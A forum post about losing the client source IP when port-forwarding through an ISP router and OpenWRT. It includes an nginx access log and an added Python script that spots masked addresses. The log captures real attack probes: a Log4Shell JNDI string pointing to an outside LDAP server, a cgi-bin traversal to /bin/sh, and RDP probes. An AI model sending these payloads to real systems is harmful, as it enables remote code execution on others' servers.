Hi,
I have a similar problem to "Need original source IP on forwarded traffic", but I didn't find a solution in that topic.
My network config:
- ISP router: router mode, 192.168.1.254, set to forward the port to my OpenWRT
- OpenWRT: 192.168.1.1, set to forward the port to my server
- Server: 192.168.1.23, receives the connection
When my router was my default gateway, I just needed to make a port forward from my ISP router to my server, and the source IP was kept.
When the OpenWRT is the default gateway, the previous rules don't work anymore...
So I set the two forwarding rules, and it worked, but I lost the source IP.
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "-"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "PRI * HTTP/2.0" 400 154 "-" "-"
124.223.101.87 - - [06/Mar/2022:10:43:50 +0000] "GET / HTTP/1.1" 444 0 "-" "/${jndi:ldap://185.203.118.200:1389/Exploit}"
62.233.50.179 - - [06/Mar/2022:10:46:12 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:11:09:32 +0000] "GET /console/ HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.218.143 - - [06/Mar/2022:11:39:10 +0000] "GET /actuator/health HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
45.146.165.37 - - [06/Mar/2022:12:23:31 +0000] "GET /_ignition/execute-solution HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.209.162 - - [06/Mar/2022:13:08:23 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.146.165.37 - - [06/Mar/2022:13:25:03 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
13.82.124.140 - - [06/Mar/2022:13:49:35 +0000] "GET / HTTP/1.1" 444 0 "-" "-"
89.248.165.24 - - [06/Mar/2022:14:02:39 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 154 "-" "-"
45.146.165.37 - - [06/Mar/2022:14:55:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 154 "-" "-"
66.249.76.50 - - [06/Mar/2022:15:20:52 +0000] "GET /robots.txt HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.146.165.37 - - [06/Mar/2022:16:07:06 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.94.93.3 - - [06/Mar/2022:16:15:48 +0000] "GET /admin/config.php HTTP/1.1" 400 252 "-" "gbrmss/7.29.0"
176.58.109.214 - - [06/Mar/2022:16:30:44 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
207.46.13.95 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
172.105.89.161 - - [06/Mar/2022:16:51:49 +0000] "GET /0bef HTTP/1.0" 400 252 "-" "-"
40.77.167.65 - - [06/Mar/2022:17:08:34 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.241.218.78 - - [06/Mar/2022:17:19:35 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 zgrab/0.x"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:33 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:37 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:03:38 +0000] "GET /style.esp.css HTTP/1.1" 500 174 "http://192.168.1.74:8888/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
192.168.1.1 - - [07/Mar/2022:11:55:55 +0000] "+\xF0\xBB\xD2\x19\xFD\x11\xDE\x0B\x87\x04\x81\xFDz\xF6s\xEFl\xE9e" 400 154 "-" "-"
192.168.1.1 - - [07/Mar/2022:11:57:23 +0000] "GET / HTTP/1.1" 500 174 "-" "libwww-perl/6.61"
192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:51:14 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:52 +0000] "GET / HTTP/1.0" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "GET /text4041646657511 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:53 +0000] "POST /sdk HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:54 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /evox/about HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:51:55 +0000] "GET /HNAP1 HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible;)"
192.168.1.1 - - [07/Mar/2022:12:52:19 +0000] "GET / HTTP/1.1" 500 174 "-" "-"
192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"
Is making 2 port forwards the right thing to do?
Can I allow traffic between WAN and my server directly?
How can I keep the source IP?
Thanks for your help
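
Added example, not part of the original post: a check over a combined-format access log that reports the days on which every request is attributed to a single private address, which is how the lost source IP appears in the log above (192.168.1.1 on 07/Mar). The function names are illustrative, and the sample lines are copied from the post.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Leading fields of an nginx/Apache "combined" access log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\]')
# A few lines copied from the log in the post above (before and after the change).
SAMPLE = r'''167.248.133.46 - - [06/Mar/2022:10:40:01 +0000] "GET / HTTP/1.1" 400 252 "-" "-"
207.46.13.95 - - [06/Mar/2022:16:51:13 +0000] "GET / HTTP/1.1" 444 0 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:24:26 +0000] "GET / HTTP/1.1" 500 174 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.168.1.1 - - [07/Mar/2022:12:52:21 +0000] "GET /favicon.ico HTTP/1.1" 500 174 "-" "curl/7.75.0"
'''.splitlines()


def parse(lines):
    """Yield (client_ip, timestamp) for each parseable line; skip the rest."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        try:
            ip = ipaddress.ip_address(m.group(1))
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        except ValueError:
            continue  # binary probes or truncated lines without a valid prefix
        yield ip, ts


def source_ip_report(lines):
    """Per day: count of requests from public clients and from private ones."""
    days = defaultdict(lambda: {"public": 0, "private": defaultdict(int)})
    for ip, ts in parse(lines):
        day = days[ts.date().isoformat()]
        if ip.is_private:
            day["private"][str(ip)] += 1
        else:
            day["public"] += 1
    return days


def masked_days(lines):
    """Days on which every request came from one private address (a NAT hop)."""
    return {d: next(iter(v["private"])) for d, v in source_ip_report(lines).items()
            if v["public"] == 0 and len(v["private"]) == 1}


if __name__ == "__main__":
    print(masked_days(SAMPLE))
```

A crawler user agent such as bingbot logged with a private client address, as in the third sample line, is the clearest sign that a hop in front of the server is rewriting the source address.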